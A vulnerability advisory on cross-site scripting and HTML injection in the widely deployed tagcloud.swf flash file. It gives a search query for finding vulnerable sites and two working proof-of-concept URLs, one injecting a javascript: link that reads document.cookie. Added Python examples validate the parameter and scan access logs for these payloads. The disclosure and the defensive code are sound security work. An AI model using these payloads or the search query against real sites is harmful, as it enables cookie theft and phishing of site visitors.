tagcloud.swf Cross Site Scripting
Posted Jan 11, 2010
Authored by MustLive

Approximately 34 million tagcloud.swf files on the Internet suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a08201662495412c103ae59c8fb8e98c443eed4b23c61bb8f3041cb0b3eaf03e

Hello Bugtraq!

Yesterday I wrote the article "XSS vulnerabilities in 34 million flash files"
(http://websecurity.com.ua/3842/), and here is the English version of it.

In December, in my article "XSS vulnerabilities in 8 million flash files"
(http://websecurity.com.ua/3789/), I wrote that there are up to 34,000,000
tagcloud.swf flash files on the Internet which are potentially vulnerable to
XSS attacks. Since people mostly didn't pay attention in the previous article
to my mention of another 34 million vulnerable flash files, I decided to write
a separate article about it.

The file tagcloud.swf was developed by the author of the WP-Cumulus plugin for
WordPress (http://websecurity.com.ua/3665/) and is shipped with that plugin,
and also with other plugins, particularly Joomulus
(http://websecurity.com.ua/3801/) and JVClouds3D
(http://websecurity.com.ua/3839/) for Joomla and Blogumus
(http://websecurity.com.ua/3843/) for Blogger. Given the prevalence of this
flash file, I'll note that it is the most widespread flash file on the
Internet with an XSS vulnerability.

-------------------------------------
Prevalence of the problem.
-------------------------------------

There are a lot of vulnerable tagcloud.swf files on the Internet (according to
Google):

http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf

If on 18.12.2009 there were about 34,000,000 results, now there are about
32,500,000 results. And these are only the flash files which were indexed by
Google; in reality there can be many more of them.

So there are about 32.5 million sites with the file tagcloud.swf which are
vulnerable to XSS and HTML Injection attacks.

Among them there are about 273,000 gov sites
(http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf+inurl:gov&filter=0)
which are vulnerable to XSS and HTML Injection attacks.

----------------------------------
Vulnerabilities in swf-file.
----------------------------------

The file tagcloud.swf is vulnerable to XSS and HTML Injection attacks via the
parameter tagcloud.

XSS:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

The code executes only after a click, so this is strictly a social-engineering XSS.

HTML Injection:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

The HTML Injection attack works in particular against those flash files which
have protection (in the flash file itself or via a WAF) against javascript:
and vbscript: URIs in the tagcloud parameter: an ordinary http link passes
such a filter but still plants an attacker-chosen link in the cloud.
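The two payloads above make the point that a scheme blocklist is the wrong fix. The following added example (not MustLive's code and not from the WP-Cumulus project) compares the javascript:/vbscript: blocklist the advisory mentions with an allowlist validator for the tagcloud parameter. It assumes the parameter carries a <tags> XML document whose <a> elements become clickable links in the movie, and that the cloud only ever links to the site's own tag pages; the hostnames in OWN_HOSTS are placeholders.

```python
"""Allowlist validation for the tagcloud.swf ``tagcloud`` parameter.

Added example, not code from MustLive or from the WP-Cumulus project. It
assumes, as the advisory describes, that the parameter carries a <tags>
XML document whose <a> elements become clickable links in the movie, and
that the site only links to its own tag pages (OWN_HOSTS is a placeholder).
"""
from urllib.parse import unquote_plus, urlsplit
import xml.etree.ElementTree as ET

ALLOWED_SCHEMES = {"http", "https"}
OWN_HOSTS = {"site", "www.site"}          # assumption: the blog's own hostnames

# The two payloads from the advisory, exactly as they appear in its URLs.
XSS_PAYLOAD = ("%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'"
               "+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E")
INJECT_PAYLOAD = ("%3Ctags%3E%3Ca+href='http://websecurity.com.ua'"
                  "+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E")
# Constructed benign cloud of the kind the plugin itself generates.
BENIGN_CLOUD = ("%3Ctags%3E%3Ca+href='http://site/tag/wordpress'"
                "+style='font-size:+12pt'%3Ewordpress%3C/a%3E%3C/tags%3E")


def blocklist_check(raw: str) -> bool:
    """The kind of protection the advisory says some sites have: reject
    javascript:/vbscript: URIs and accept everything else."""
    decoded = unquote_plus(raw).lower()
    return not any(s in decoded for s in ("javascript:", "vbscript:"))


def allowlist_check(raw: str) -> tuple[bool, str]:
    """Accept the cloud only if it is well-formed <tags> XML in which every
    child is a flat <a> whose href is an http(s) link to one of OWN_HOSTS.
    Returns (accepted, reason)."""
    decoded = unquote_plus(raw)
    try:
        # ElementTree does not fetch external entities; in production prefer
        # defusedxml for a stricter parser.
        root = ET.fromstring(decoded)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if root.tag != "tags":
        return False, f"unexpected root element <{root.tag}>"
    for elem in root:
        if elem.tag != "a":
            return False, f"unexpected element <{elem.tag}>"
        if len(elem):
            return False, "nested markup inside <a>"
        href = elem.get("href", "").strip()
        parts = urlsplit(href)
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            return False, f"disallowed scheme {parts.scheme!r} in {href!r}"
        if parts.hostname not in OWN_HOSTS:
            return False, f"off-site link to {parts.hostname!r}"
    return True, "ok"


if __name__ == "__main__":
    for name, raw in (("xss", XSS_PAYLOAD),
                      ("inject", INJECT_PAYLOAD),
                      ("benign", BENIGN_CLOUD)):
        print(f"{name:7} blocklist={blocklist_check(raw)!s:5} "
              f"allowlist={allowlist_check(raw)}")
```

Run stand-alone, the script shows the blocklist rejecting the javascript: payload but accepting the websecurity.com.ua link, while the allowlist rejects both and accepts only the constructed benign cloud. The same structural check belongs wherever the cloud XML is assembled or proxied, since the movie itself cannot be patched on 32.5 million sites at once.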

----------------------------------------
Examples of vulnerable sites.
----------------------------------------

I gave examples of vulnerable sites with this swf file in the post "XSS
vulnerabilities in tagcloud.swf at gov and gov.ua"
(http://websecurity.com.ua/3835/).

So flash developers should attend to the security of their flash files. And
owners of sites with vulnerable flash files (particularly tagcloud.swf) need
either to fix them themselves or to turn to their developers.
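Until the file is fixed, a site owner can at least see whether the vector is being used against them. This added example (not part of the advisory, nor code from any of the plugins it names) scans combined-format access log lines for requests to tagcloud.swf whose tagcloud query parameter carries links with a non-http(s) scheme or links pointing away from the site's own hosts. The log lines are constructed from the advisory's two URLs plus one legitimate request, and OWN_HOSTS is a placeholder.

```python
"""Flag requests that push attacker-controlled link markup into tagcloud.swf.

Added example, not code from the advisory or from the plugins it names.
It reads combined-format access log lines (the sample lines are
constructed) and reports any request for tagcloud.swf whose tagcloud
query parameter carries a link with a non-http(s) scheme or a link to a
host other than the site's own (OWN_HOSTS is an assumed placeholder).
"""
import re
from urllib.parse import parse_qs, urlsplit

OWN_HOSTS = {"site", "www.site"}   # assumption: hostnames the cloud may link to

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
HREF_RE = re.compile(r"""href\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)

# Constructed log lines: the two advisory payloads and one legitimate request.
SAMPLE_LOG = [
    "203.0.113.7 - - [11/Jan/2010:09:12:41 +0200] \"GET /tagcloud.swf?mode=tags"
    "&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'"
    "+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1\" 200 31244",
    "203.0.113.7 - - [11/Jan/2010:09:13:02 +0200] \"GET /tagcloud.swf?mode=tags"
    "&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'"
    "+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1\" 200 31244",
    "198.51.100.4 - - [11/Jan/2010:09:15:10 +0200] \"GET /tagcloud.swf?mode=tags"
    "&tagcloud=%3Ctags%3E%3Ca+href='http://site/tag/wordpress'"
    "+style='font-size:+12pt'%3Ewordpress%3C/a%3E%3C/tags%3E HTTP/1.1\" 200 31244",
]


def classify_href(href):
    """Return a reason string if the link should not appear in the cloud."""
    parts = urlsplit(href.strip())
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        return f"non-http scheme {scheme!r}"
    if parts.hostname not in OWN_HOSTS:
        return f"off-site link to {parts.hostname!r}"
    return None


def inspect_line(line):
    """Parse one log line; return a finding dict or None if nothing is wrong."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    if not target.path.lower().endswith("/tagcloud.swf"):
        return None
    cloud = parse_qs(target.query).get("tagcloud")
    if not cloud:
        return None           # cloud came from flashvars, nothing in the URL
    # parse_qs already percent-decoded the markup and turned '+' into spaces.
    reasons = [r for r in map(classify_href, HREF_RE.findall(cloud[0])) if r]
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "status": m.group("status"), "reasons": reasons}


def scan(lines):
    """Return the findings for every suspicious request in an iterable of lines."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Pipe a real access log into `scan` (one line per element) to get the client address, timestamp and the offending link for each hit; a status of 200 on a flagged line means the movie was served with the injected cloud, which is the case worth following up.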

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua